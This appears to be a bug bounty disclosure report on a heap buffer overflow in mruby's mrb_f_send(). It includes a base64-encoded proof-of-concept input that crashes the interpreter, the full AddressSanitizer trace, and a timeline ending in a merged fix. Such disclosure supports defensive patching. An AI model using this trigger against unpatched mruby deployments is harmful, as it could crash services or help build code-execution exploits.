Heap-based Buffer Overflow in mruby/mruby

Valid

Reported on

Feb 12th 2022


Description

Heap Overflow occurs in mrb_f_send().

commit : 38b164ace7d6ae1c367883a3d67d7f559783faad

Proof of Concept

$ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2Vu
ZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiCg==" | base64 -d > poc

# ASAN
$ ./bin/mruby poc
=================================================================
==160090==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c0000000c0 at pc 0x00000058752e bp 0x7ffffffe7430 sp 0x7ffffffe7428
READ of size 8 at 0x60c0000000c0 thread T0
    #0 0x58752d in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:695:12
    #1 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #2 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #3 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #4 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #5 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #6 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #7 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #8 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #9 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #10 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #11 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #12 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #13 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #14 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #15 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #16 0x58808b in mrb_f_send /home/alkyne/mruby-debug/src/vm.c:732:12
    #17 0x59ce54 in mrb_vm_exec /home/alkyne/mruby-debug/src/vm.c:1633:18
    #18 0x58c1da in mrb_vm_run /home/alkyne/mruby-debug/src/vm.c:1128:12
    #19 0x586949 in mrb_top_run /home/alkyne/mruby-debug/src/vm.c:3037:12
    #20 0x68dd7b in mrb_load_exec /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6883:7
    #21 0x68ef5b in mrb_load_detect_file_cxt /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6926:12
    #22 0x4cd28f in main /home/alkyne/mruby-debug/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #23 0x7ffff7a690b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #24 0x41d70d in _start (/home/alkyne/mruby-debug/bin/mruby.asan+0x41d70d)

0x60c0000000c0 is located 0 bytes to the right of 128-byte region [0x60c000000040,0x60c0000000c0)
allocated by thread T0 here:
    #0 0x4988e9 in realloc (/home/alkyne/mruby-debug/bin/mruby.asan+0x4988e9)
    #1 0x5f52b5 in mrb_default_allocf /home/alkyne/mruby-debug/src/state.c:68:12
    #2 0x65521e in mrb_realloc_simple /home/alkyne/mruby-debug/src/gc.c:226:8
    #3 0x6557a4 in mrb_realloc /home/alkyne/mruby-debug/src/gc.c:240:8
    #4 0x6558d0 in mrb_malloc /home/alkyne/mruby-debug/src/gc.c:256:10
    #5 0x4d06cc in ary_new_capa /home/alkyne/mruby-debug/src/array.c:37:35
    #6 0x4d0c13 in ary_new_from_values /home/alkyne/mruby-debug/src/array.c:84:22
    #7 0x4d0b38 in mrb_ary_new_from_values /home/alkyne/mruby-debug/src/array.c:95:22
    #8 0x5b7a1f in mrb_vm_exec /home/alkyne/mruby-debug/src/vm.c:2605:17
    #9 0x58c1da in mrb_vm_run /home/alkyne/mruby-debug/src/vm.c:1128:12
    #10 0x586949 in mrb_top_run /home/alkyne/mruby-debug/src/vm.c:3037:12
    #11 0x68dd7b in mrb_load_exec /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6883:7
    #12 0x68ef5b in mrb_load_detect_file_cxt /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6926:12
    #13 0x4cd28f in main /home/alkyne/mruby-debug/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #14 0x7ffff7a690b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/alkyne/mruby-debug/src/vm.c:695:12 in mrb_f_send
Shadow bytes around the buggy address:
  0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c187fff8010: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==160090==ABORTING

Impact

Heap based Buffer Overflow may lead to exploiting the program, which can allow the attacker to execute arbitrary code.

We are processing your report and will contact the mruby team within 24 hours. 3 months ago
alkyne Choi modified the report
3 months ago
We have contacted a member of the mruby team and are waiting to hear back 3 months ago
Yukihiro "Matz" Matsumoto modified the report
3 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 3 months ago
alkyne Choi has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on 47068a 3 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
to join this conversation